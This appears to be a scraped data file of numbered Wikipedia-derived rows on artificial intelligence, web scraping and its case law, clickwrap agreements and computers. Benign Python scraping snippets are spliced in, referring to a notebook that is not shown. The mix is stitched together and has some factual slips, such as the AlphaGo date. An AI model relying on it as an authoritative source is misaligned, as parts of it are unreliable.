285 In 2016, issues of fairness and the misuse of technology were catapulted into center stage at machine learning conferences, publications vastly increased, funding became available, and many researchers re-focussed their careers on these issues. The alignment problem became a serious field of academic study. 262 In the late teens and early 2020s, AGI companies began to deliver programs that created enormous interest. In 2015, AlphaGo, developed by DeepMind, beat the world champion Go player. The program was taught only the rules of the game and developed strategy by itself. GPT 3 is a large language model that was released in 2020 by OpenAI and is capable of generating high-quality human-like text. 327 These programs, and others, inspired an aggressive AI boom, where large companies began investing billions in AI research. According to AI Impacts, about $50 billion annually was invested in "AI" around 2022 in the U.S. alone and about 20% of the new U.S. Computer Science PhD graduates have specialized in "AI". 328 About 800,000 "AI" related U.S. job openings existed in 2022. 329 Alan Turing wrote in 1950 "I propose to consider the question 'can machines think'? 330 He advised changing the question from whether a machine "thinks", to "whether or not it is possible for machinery to show intelligent behaviour". 330 He devised the Turing test, which measures the ability of a machine to simulate human conversation. 300 Since we can only observe the behavior of the machine, it does not matter if it is "actually" thinking or literally has a "mind". Turing notes that we can not determine these things about other people but "it is usual to have a polite convention that everyone thinks. 331 Russell and Norvig agree with Turing that intelligence must be defined in terms of external behavior, not internal structure. 1 However, they are critical that the test requires the machine to imitate humans. "Aeronautical engineering texts, they wrote, "do not define the goal of their field as making 'machines that fly so exactly like pigeons that they can fool other pigeons. 332 AI founder John McCarthy agreed, writing that "Artificial intelligence is not, by definition, simulation of human intelligence". 333 McCarthy defines intelligence as "the computational part of the ability to achieve goals in the world". 334 Another AI founder, Marvin Minsky similarly describes it as "the ability to solve hard problems". 335 The leading AI textbook defines it as the study of agents that perceive their environment and take actions that maximize their chances of achieving defined goals. 1 These definitions view intelligence in terms of well-defined problems with well-defined solutions, where both the difficulty of the problem and the performance of the program are direct measures of the "intelligence" of the machine—and no other philosophical discussion is required, or may not even be possible. Another definition has been adopted by Google, 336 a major practitioner in the field of AI. This definition stipulates the ability of systems to synthesize information as the manifestation of intelligence, similar to the way it is defined in biological intelligence. Some authors have suggested in practice, that the definition of AI is vague and difficult to define, with contention as to whether classical algorithms should be categorised as AI, 337 with many companies during the early 2020s AI boom using the term as a marketing buzzword, often even if they did "not actually use AI in a material way". 
338 No established unifying theory or paradigm has guided AI research for most of its history. z The unprecedented success of statistical machine learning in the 2010s eclipsed all other approaches (so much so that some sources, especially in the business world, use the term "artificial intelligence" to mean "machine learning with neural networks"). This approach is mostly sub-symbolic, soft and narrow. Critics argue that these questions may have to be revisited by future generations of AI researchers. Symbolic AI (or "GOFAI") 340 simulated the high-level conscious reasoning that people use when they solve puzzles, express legal reasoning and do mathematics. They were highly successful at "intelligent" tasks such as algebra or IQ tests. In the 1960s, Newell and Simon proposed the physical symbol systems hypothesis: "A physical symbol system has the necessary and sufficient means of general intelligent action. 341 However, the symbolic approach failed on many tasks that humans solve easily, such as learning, recognizing an object or commonsense reasoning. Moravec's paradox is the discovery that high-level "intelligent" tasks were easy for AI, but low level "instinctive" tasks were extremely difficult. 342 Philosopher Hubert Dreyfus had argued since the 1960s that human expertise depends on unconscious instinct rather than conscious symbol manipulation, and on having a "feel" for the situation, rather than explicit symbolic knowledge. 343 Although his arguments had been ridiculed and ignored when they were first presented, eventually, AI research came to agree with him. aa 20 The issue is not resolved: sub-symbolic reasoning can make many of the same inscrutable mistakes that human intuition does, such as algorithmic bias. Critics such as Noam Chomsky argue continuing research into symbolic AI will still be necessary to attain general intelligence, 345 346 in part because sub-symbolic AI is a move away from explainable AI: it can be difficult or impossible to understand why a modern statistical AI program made a particular decision. The emerging field of neuro-symbolic artificial intelligence attempts to bridge the two approaches. "Neats" hope that intelligent behavior is described using simple, elegant principles (such as logic, optimization, or neural networks). "Scruffies" expect that it necessarily requires solving a large number of unrelated problems. Neats defend their programs with theoretical rigor, scruffies rely mainly on incremental testing to see if they work. This issue was actively discussed in the 1970s and 1980s, 347 but eventually was seen as irrelevant. Modern AI has elements of both. Finding a provably correct or optimal solution is intractable for many important problems. 19 Soft computing is a set of techniques, including genetic algorithms, fuzzy logic and neural networks, that are tolerant of imprecision, uncertainty, partial truth and approximation. Soft computing was introduced in the late 1980s and most successful AI programs in the 21st century are examples of soft computing with neural networks. AI researchers are divided as to whether to pursue the goals of artificial general intelligence and superintelligence directly or to solve as many specific problems as possible (narrow AI) in hopes these solutions will lead indirectly to the field's long-term goals. 348 349 General intelligence is difficult to define and difficult to measure, and modern AI has had more verifiable successes by focusing on specific problems with specific solutions. 
The experimental sub-field of artificial general intelligence studies this area exclusively. It is not settled in the philosophy of mind whether a machine can have a mind, consciousness and mental states in the same sense that human beings do. This issue considers the internal experiences of the machine, rather than its external behavior. Mainstream AI research considers this issue irrelevant because it does not affect the goals of the field: to build machines that can solve problems using intelligence. Russell and Norvig add that "the additional project of making a machine conscious in exactly the way humans are is not one that we are equipped to take on." 350 However, the question has become central to the philosophy of mind. It is also typically the central question at issue in artificial intelligence in fiction. David Chalmers identified two problems in understanding the mind, which he named the "hard" and "easy" problems of consciousness. 351 The easy problem is understanding how the brain processes signals, makes plans and controls behavior. The hard problem is explaining how this feels or why it should feel like anything at all, assuming we are right in thinking that it truly does feel like something (Dennett's consciousness illusionism says this is an illusion). While human information processing is easy to explain, human subjective experience is difficult to explain. For example, it is easy to imagine a color-blind person who has learned to identify which objects in their field of view are red, but it is not clear what would be required for the person to know what red looks like. 352 Computationalism is the position in the philosophy of mind that the human mind is an information processing system and that thinking is a form of computing. Computationalism argues that the relationship between mind and body is similar or identical to the relationship between software and hardware and thus may be a solution to the mind-body problem. This philosophical position was inspired by the work of AI researchers and cognitive scientists in the 1960s and was originally proposed by philosophers Jerry Fodor and Hilary Putnam. 353 Philosopher John Searle characterized this position as "strong AI": "The appropriately programmed computer with the right inputs and outputs would thereby have a mind in exactly the same sense human beings have minds." Searle counters this assertion with his Chinese room argument, which attempts to show that, even if a machine perfectly simulates human behavior, there is still no reason to suppose it also has a mind. 357 It is difficult or impossible to reliably evaluate whether an advanced AI is sentient (has the ability to feel), and if so, to what degree. 358 But if there is a significant chance that a given machine can feel and suffer, then it may be entitled to certain rights or welfare protection measures, similarly to animals. 359 360 Sapience (a set of capacities related to high intelligence, such as discernment or self-awareness) may provide another moral basis for AI rights. 359 Robot rights are also sometimes proposed as a practical way to integrate autonomous agents into society. 361 In 2017, the European Union considered granting "electronic personhood" to some of the most capable AI systems. Similarly to the legal status of companies, it would have conferred rights but also responsibilities. 
362 Critics argued in 2018 that granting rights to AI systems would downplay the importance of human rights, and that legislation should focus on user needs rather than speculative futuristic scenarios. They also noted that robots lacked the autonomy to take part to society on their own. 363 364 Progress in AI increased interest in the topic. Proponents of AI welfare and rights often argue that AI sentience, if it emerges, would be particularly easy to deny. They warn that this may be a moral blind spot analogous to slavery or factory farming, which could lead to large-scale suffering if sentient AI is created and carelessly exploited. 360 359 A superintelligence is a hypothetical agent that would possess intelligence far surpassing that of the brightest and most gifted human mind. 349 If research into artificial general intelligence produced sufficiently intelligent software, it might be able to reprogram and improve itself. The improved software would be even better at improving itself, leading to what I. J. Good called an "intelligence explosion" and Vernor Vinge called a "singularity". 365 However, technologies cannot improve exponentially indefinitely, and typically follow an S-shaped curve, slowing when they reach the physical limits of what the technology can do. 366 Robot designer Hans Moravec, cyberneticist Kevin Warwick, and inventor Ray Kurzweil have predicted that humans and machines will merge in the future into cyborgs that are more capable and powerful than either. This idea, called transhumanism, has roots in Aldous Huxley and Robert Ettinger. 367 Edward Fredkin argues that "artificial intelligence is the next stage in evolution", an idea first proposed by Samuel Butler's "Darwin among the Machines" as far back as 1863, and expanded upon by George Dyson in his 1998 book Darwin Among the Machines: The Evolution of Global Intelligence. 368 Thought-capable artificial beings have appeared as storytelling devices since antiquity, 369 and have been a persistent theme in science fiction. 370 A common trope in these works began with Mary Shelley's Frankenstein, where a human creation becomes a threat to its masters. This includes such works as Arthur C. Clarke's and Stanley Kubrick's 2001: A Space Odyssey (both 1968), with HAL 9000, the murderous computer in charge of the Discovery One spaceship, as well as The Terminator (1984) and The Matrix (1999). In contrast, the rare loyal robots such as Gort from The Day the Earth Stood Still (1951) and Bishop from Aliens (1986) are less prominent in popular culture. 371 Isaac Asimov introduced the Three Laws of Robotics in many stories, most notably with the "Multivac" super-intelligent computer. Asimov's laws are often brought up during lay discussions of machine ethics; 372 while almost all artificial intelligence researchers are familiar with Asimov's laws through popular culture, they generally consider the laws useless for many reasons, one of which is their ambiguity. 373 Several works use AI to force us to confront the fundamental question of what makes us human, showing us artificial beings that have the ability to feel, and thus to suffer. This appears in Karel apek's R.U.R., the films A.I. Artificial Intelligence and Ex Machina, as well as the novel Do Androids Dream of Electric Sheep?, by Philip K. Dick. Dick considers the idea that our understanding of human subjectivity is altered by technology created with artificial intelligence. 
374 The source article closes by listing the two most widely used AI textbooks in 2023 (see the Open Syllabus), four of the most widely used AI textbooks in 2008, and their later editions. |
595 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#European_Union | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
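The fetch-then-extract workflow described above can be sketched with the requests and BeautifulSoup libraries already imported earlier in this notebook. The target URL, the tag choices, and the function name below are illustrative assumptions rather than anything prescribed by the article; this is a minimal sketch of one possible fetch-and-extract step, not a definitive implementation.
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

def fetch_and_extract(url):
    # Fetching: download the page, as a browser would when a user views it.
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Extraction: parse the HTML into a searchable tree.
    soup = BeautifulSoup(response.text, "html.parser")
    # Collect visible paragraph text, which could later be cleaned and stored.
    paragraphs = [p.get_text(" ", strip=True) for p in soup.find_all("p")]
    # Resolve relative links against the page URL so they can be crawled later.
    links = [urljoin(url, a["href"]) for a in soup.find_all("a", href=True)]
    return paragraphs, links

# Example usage with a placeholder URL:
# text_blocks, outgoing_links = fetch_and_extract("https://example.com/")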
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
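As a minimal illustration of the grep-style, regular-expression approach mentioned above, the sketch below uses Python's re module (already imported in this notebook) to pull dollar amounts and e-mail addresses out of raw HTML. The sample HTML fragment and both patterns are assumptions chosen purely for demonstration.
import re

# A small, made-up HTML fragment standing in for a fetched page.
sample_html = """
<ul>
  <li>Widget A - $19.99 - contact sales@example.com</li>
  <li>Widget B - $249.00 - contact support@example.com</li>
</ul>
"""

# Patterns for dollar amounts and e-mail addresses.
price_pattern = re.compile(r"\$\d+(?:\.\d{2})?")
email_pattern = re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+")

prices = price_pattern.findall(sample_html)  # ['$19.99', '$249.00']
emails = email_pattern.findall(sample_html)  # ['sales@example.com', 'support@example.com']
print(prices, emails)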
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
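The specific anti-bot techniques are not reproduced above, but one convention already mentioned in this document is the robots.txt file. The sketch below, a minimal example assuming a hypothetical site and user-agent string, shows how a scraper can honour robots.txt with Python's standard urllib.robotparser and throttle itself with the time module imported earlier in this notebook.
import time
from urllib.robotparser import RobotFileParser

def allowed_by_robots(base_url, path, user_agent="MyResearchBot"):
    # Download and parse the site's robots.txt, then ask whether this path may be fetched.
    rp = RobotFileParser()
    rp.set_url(base_url.rstrip("/") + "/robots.txt")
    rp.read()
    return rp.can_fetch(user_agent, base_url.rstrip("/") + path)

# Example usage with a placeholder site: skip disallowed paths and pause between
# requests so the scraper does not overload the server.
# for path in ["/", "/public-data", "/private"]:
#     if allowed_by_robots("https://example.com", path):
#         pass  # fetch and parse the page here
#     time.sleep(2)  # simple rate limiting between requests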
596 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Clickwrap | A clickwrap or clickthrough agreement is a prompt that offers individuals the opportunity to accept or decline a digitally-mediated policy. 1 2 Privacy policies, terms of service and other user policies, as well as copyright policies commonly employ the clickwrap prompt. Clickwraps are common in signup processes for social media services like Facebook, Twitter or Tumblr, connections to wireless networks operated in corporate spaces, as part of the installation processes of many software packages, and in other circumstances where agreement is sought using digital media. The name "clickwrap" is derived from the use of "shrink wrap contracts" commonly used in boxed software purchases, which "contain a notice that by tearing open the shrinkwrap, the user assents to the software terms enclosed within". 3 The content and form of clickwrap agreements vary widely. Most clickwrap agreements require the end-user to indicate their assent by clicking an "ok" or "agree" button on a dialog box or pop-up window. A user indicates rejection by clicking cancel or closing the window. If the user opts to reject the terms, they cannot use or purchase the product or service. Classically, such a take-it-or-leave-it contract is described as a "contract of adhesion, which is a contract that lacks bargaining power, forcing one party to be favored over the other. The terms of service or license do not always appear on the same webpage or window, but are always accessible before acceptance, such as through a hyperlink embedded in the product's webpage or a pop-up screen prior to installation. In order to be deemed to have accepted the terms of service, the purchaser must be put on notice that certain terms of service may apply. If the terms of service are not visible and or accessible, courts have found the notice requirement to be lacking and as such, the purchaser may not be bound to the terms of the agreement. An analysis of the terms of service of major consumer websites has found that they frequently contain clauses that impede consumer rights in substantial and often unexpected ways. 4 Few cases have considered the validity of clickwrap licenses. Still, in the cases that have challenged their validity, the terms of the contract have usually been upheld: Even though courts have ruled some clickwrap licenses to be enforceable contracts, it does not follow that every term of every clickwrap license is enforceable. Clickwrap licenses must still meet the criteria for enforceability of a unilateral form contract. For example, see Bragg v. Linden Research, Inc., 487 F.Supp.2d 593 (E.D. Pa. 2007), in which the judge found certain aspects of the Second Life clickwrap agreement "unconscionable, and therefore unenforceable". 1 In Register.com, Inc. v. Verio, Inc., 356 F.3d 393 (2d. Cir. 2004), the court described a clickwrap license, even though the license in question was distinguished from a clickwrap license Essentially, under a clickwrap arrangement, potential licensees are presented with the proposed license terms and forced to expressly and unambiguously manifest either assent or rejection prior to being given access to the product. An earlier case, Specht v. Netscape Communications Corp., 150 F.Supp.2d 585 (S.D.N.Y. 2001), aff'd, 306 F.3d 17 (2d. Cir. 2002), gave perhaps the clearest definition of a clickwrap license. 
A click-wrap license presents the user with a message on his or her computer screen, requiring that the user manifest his or her assent to the terms of the license agreement by clicking on an icon. The product cannot be obtained or used unless and until the icon is clicked. For example, when a user attempts to obtain Netscape's Communicator or Navigator, a web page appears containing the full text of the Communicator / Navigator license agreement. Plainly visible on the screen is the query, "Do you accept all the terms of the preceding license agreement? If so, click on the Yes button. If you select No, Setup will close." Below this text are three buttons or icons: one labeled "Back" and used to return to an earlier step of the download preparation; one labeled "No," which, if clicked, terminates the download; and one labeled "Yes," which, if clicked, allows the download to proceed. Unless the user clicks "Yes," indicating his or her assent to the license agreement, the user cannot obtain the software. The clickwrap method was presented to the court in ProCD v. Zeidenberg, 86 F.3d 1447 (7th Cir. 1996), where Zeidenberg purchased a CD-ROM, created by ProCD, which contained a compilation of a telephone directory database. Upon purchase of this CD-ROM, Zeidenberg installed the software onto his computer and then created a website that offered visitors the information contained on the CD-ROM at a price lower than what ProCD charged for the software. Prior to his purchase of the software, Zeidenberg may not have been aware of any prohibition on use or dissemination of the product without ProCD's consent. However, upon preparing to install the software onto his computer, the software license appeared on his screen and would not allow him to continue with the installation without indicating acceptance by clicking his assent in a dialog box. The court held that Zeidenberg did accept the offer and the terms contained within the license by clicking through the dialog box. Zeidenberg had the opportunity to read the terms of the license prior to clicking the acceptance box. The court further stated that Zeidenberg could have rejected the terms of the contract and returned the software. (Id.) 6 7 More recently, in the 2017 opinion Meyer v. Uber Technologies, the United States Court of Appeals for the Second Circuit held that users were on fair notice of the arbitration provision in Uber's registration process, because Uber presented the app's terms of service via hyperlink. "While it may be the case that many users will not bother reading the additional terms, that is the choice the user makes," Judge Chin wrote. "The user is still on inquiry notice." The Court further held that "when considering the perspective of a reasonable smartphone user, we need not presume that the user has never before encountered an app or entered into a contract using a smartphone..." Instead, the Court explained that a reasonable user would know that by clicking the registration button, he was agreeing to the terms and conditions accessible via the hyperlink, whether he clicked on the hyperlink or not. 8 9 On 21 May 2015, the European Court of Justice decided in the case of El Majdoub v. 
CarsOnTheWeb.Deutschland GmbH (case no. C-322/14), on a referral from a German court, 10 that click-wrap agreements are acceptable under certain circumstances as a "durable record" of the acceptance of general conditions within the meaning of Regulation 44/2001 (now replaced by Regulation 1215/2012, also known as the 'Brussels I Recast Regulation'). 11 Clickwraps have been shown to have an agenda-setting function, wherein aspects of clickwraps like prominent join buttons are easier to notice than the links to the privacy policies. 12 YouTube Video: The Clickwrap and The Biggest Lie on the Internet |
597 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computers | A computer is a machine that can be programmed to automatically carry out sequences of arithmetic or logical operations (computation). Modern digital electronic computers can perform generic sets of operations known as programs. These programs enable computers to perform a wide range of tasks. The term computer system may refer to a nominally complete computer that includes the hardware, operating system, software, and peripheral equipment needed and used for full operation; or to a group of computers that are linked and function together, such as a computer network or computer cluster. A broad range of industrial and consumer products use computers as control systems, including simple special-purpose devices like microwave ovens and remote controls, and factory devices like industrial robots. Computers are at the core of general-purpose devices such as personal computers and mobile devices such as smartphones. Computers power the Internet, which links billions of computers and users. Early computers were meant to be used only for calculations. Simple manual instruments like the abacus have aided people in doing calculations since ancient times. Early in the Industrial Revolution, some mechanical devices were built to automate long, tedious tasks, such as guiding patterns for looms. More sophisticated electrical machines did specialized analog calculations in the early 20th century. The first digital electronic calculating machines were developed during World War II, both electromechanical and using thermionic valves. The first semiconductor transistors in the late 1940s were followed by the silicon-based MOSFET (MOS transistor) and monolithic integrated circuit chip technologies in the late 1950s, leading to the microprocessor and the microcomputer revolution in the 1970s. The speed, power, and versatility of computers have been increasing dramatically ever since then, with transistor counts increasing at a rapid pace (Moore's law noted that counts doubled every two years), leading to the Digital Revolution during the late 20th and early 21st centuries. Conventionally, a modern computer consists of at least one processing element, typically a central processing unit (CPU) in the form of a microprocessor, together with some type of computer memory, typically semiconductor memory chips. The processing element carries out arithmetic and logical operations, and a sequencing and control unit can change the order of operations in response to stored information. Peripheral devices include input devices (keyboards, mice, joystick, etc.), output devices (monitor screens, printers, etc.), and input output devices that perform both functions (e.g., the 2000s-era touchscreen). Peripheral devices allow information to be retrieved from an external source, and they enable the results of operations to be saved and retrieved. It was not until the mid 20th century that the word acquired its modern definition; according to the Oxford English Dictionary, the first known use of the word computer was in a different sense, in a 1613 book called The Yong Mans Gleanings by the English writer Richard Brathwait: "I haue sic read the truest computer of Times, and the best Arithmetician that euer sic breathed, and he reduceth thy dayes into a short number. This usage of the term referred to a human computer, a person who carried out calculations or computations. 
